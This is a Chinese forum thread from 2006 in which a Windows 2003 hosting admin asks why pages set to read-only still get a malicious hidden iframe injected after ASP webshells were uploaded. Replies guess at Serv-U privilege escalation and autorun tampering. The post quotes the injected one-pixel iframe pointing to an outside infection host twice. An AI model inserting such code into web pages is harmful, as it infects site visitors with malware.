28,391
社区成员
发帖
与我相关
我的任务
分享ASP(只读权限)文件,被加入木马!
我的主机是2003系统.因为有不少客户的网站放在上面.有的程序会有漏洞.服务器就被上传了木马.如:海阳顶端等。上传上来这些ASP木马以后,会在很多的网页文件里加入含有病毒的链接 如:
<iframe src="mm.47555.com/abcd.htm" height="1" width="1"></iframe>
浏览者一旦访问包含些信息的页,就会被感染。
后来看了一遍技术帖。说是把网页文件设置成只读就不会被加入了。
后来我把所有的文件权限均给了:everyone(只读)
而且经过测试。即使上传了木马只读的页面也不会被加入代码。可是现在还是又被加入了。难道是权限的问题吗?还是系统被侵入了??
望大侠指点。多谢!!!
<iframe src="mm.47555.com/abcd.htm" height="1" width="1"></iframe>
浏览者一旦访问包含些信息的页,就会被感染。
后来看了一遍技术帖。说是把网页文件设置成只读就不会被加入了。
后来我把所有的文件权限均给了:everyone(只读)
而且经过测试。即使上传了木马只读的页面也不会被加入代码。可是现在还是又被加入了。难道是权限的问题吗?还是系统被侵入了??
望大侠指点。多谢!!!
...全文
请发表友善的回复…
发表回复
葫芦的世界 2006-07-13
- 打赏
- 举报
刚才看了一下.发现有人竟然在我的主机里建立了管理员!!!!!!!!!!!!!!!!!!!!!
不知道是通过什么途径建立的.初步分析是serv-U提权.
不知道是通过什么途径建立的.初步分析是serv-U提权.
葫芦的世界 2006-07-13
- 打赏
- 举报
开机自动运行的文件,他也不可能建立呀.因为他没有相应的权限.不
葫芦的世界 2006-07-13
- 打赏
- 举报
sibang(好好学习-天天想上!) ,能不能说的具体点!!期待中.............
zhuangyan2004 2006-07-13
- 打赏
- 举报
我的设成只读后就没被改过
www_7di_net 2006-07-13
- 打赏
- 举报
这个很简单,只要能修改系统盘的资料,随便在某个开机自动运行的文件中动一下手脚,你的整个服务器都为他所用了
葫芦的世界 2006-07-12
- 打赏
- 举报
不好意思呀!我下班回家了。本来半小时就可以到的。可是今天北京下雨了,好大呀!所以现在才回来。解决问题马上给分。
agaovxy 2006-07-12
- 打赏
- 举报
其实有些人,把好资料给他了,鸟都不鸟一下,真是郁闷,怎么也给点分吧,无私奉献得点分也不为过
agaovxy 2006-07-12
- 打赏
- 举报
http://vod.5n1.cn/ 网上看到的牛b权限设置,自己做实验
葫芦的世界 2006-07-12
- 打赏
- 举报
我试了。根本不能改!!!因为是只读的。所以我怀疑是不是他得到了更高的权限。
我的文件权限设置为:administrators(完全),everyone(只读).
如果可以改的话。那就只能是管理员了!!!!不过,得到管理员的权限没有那么容易的。所以,我还是怀疑是用的别的方式加的。请高手指点!
我的文件权限设置为:administrators(完全),everyone(只读).
如果可以改的话。那就只能是管理员了!!!!不过,得到管理员的权限没有那么容易的。所以,我还是怀疑是用的别的方式加的。请高手指点!
yousite1 2006-07-12
- 打赏
- 举报
估计还 是权限没设置好的问题,你直接弄个海洋改改看看行不行?
如果不行,可能白客获得更高权限了吧
如果不行,可能白客获得更高权限了吧
葫芦的世界 2006-07-12
- 打赏
- 举报
顶!!
jacklinchen 2006-07-12
- 打赏
- 举报
关注中...
